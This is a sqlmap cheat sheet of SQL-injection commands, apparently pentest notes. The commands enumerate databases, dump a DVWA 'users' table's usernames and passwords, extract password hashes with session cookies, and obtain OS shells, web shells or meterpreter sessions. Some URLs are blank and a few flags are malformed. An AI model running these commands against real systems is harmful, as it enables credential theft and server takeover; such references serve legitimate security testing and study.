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sqlmap - A tool for testing SQL injection

GET parameter

sqlmap -u ‘ -p id --technique=U
# -p: to indicate an injectable parameter 
# --technique=U  //to indicate a UNION based SQL injection technique // E: error based  // 
# -b: banner of the database
# --tor: to use a proxy to connect to the target URL
# -v3: to see the payloads that sqlmap is using
# --flush-session: to refresh sessions
# --tamper: default tampers are in /usr/share/sqlmap/tamper

POST parameter

sqlmap -u <URL> --data=<POST string> -p parameter [options]

Using -r file

Capture the request with burpsuite and save it to a file.

# Get all databases
sqlmap -r nameoffiletoinject --method POST --data "parameter=lala" -p parameter --dbs    

# Get all tables 
sqlmap -r nameoffiletoinject --tables

# Get all columns of a given database dwva
sqlmap -r nameoffiletoinject --current-db dwva -columns

# Get all tables of a given database, for example dwva
sqlmap -r nameoffiletoinject -D dwva --tables

# Get all columns of a given table in a given database
sqlmap -r nameoffiletoinject -D dwva -T users --columns

# Dump users table
sqlmap -r nameoffiletoinject -D dwva -T users --dump

# Get columns username and password of table users from table dwva
sqlmap -r nameoffiletoinject -D dwva -T users -C username,password --dump

# Automatically attempt to upload a web shell using the vulnerable parameter and execute it
sqlmap -r nameoffiletoinject -p vuln-param -os-shell 

# Alternatively use the os-pwn option to gain a shell using meterpreter or vnc 
sqlmap -r nameoffiletoinject -p vuln-param -os-pwn 

Using URL

You can also provide the url with --url or -u

sqlmap --url ‘’  --dbs --batch //
sqlmap --url ‘’  --users // gets users
sqlmap --url ‘’  --tables // gets all tables
sqlmap --url ‘’  --batch //

# Check what users we have and which privileges that user has.
sqlmap -u $IP/path.php --forms --cookie="PHPSESSID=v5098os3cdua2ps0nn4ueuvuq6" --batch --users

# Dump the password hash for an user (postgres in the example) and exploit that super permission.
sqlmap -u --forms --cookie="PHPSESSID=e14ch3u8gfbq8u3h97t8bqss9o" -U postgres --password --batch

# Get a shell 
sqlmap -u --forms --cookie="PHPSESSID=e14ch3u8gfbq8u3h97t8bqss9o" --batch --os-shell                  

Getting a direct SQL Shell

# Get a OS shell
sqlmap --url ‘’  --os-shell

# GEt a SQL shell
sqlmap --url ‘’  --sql-shell
Last update: 2024-03-06
Created: January 3, 2023 01:16:43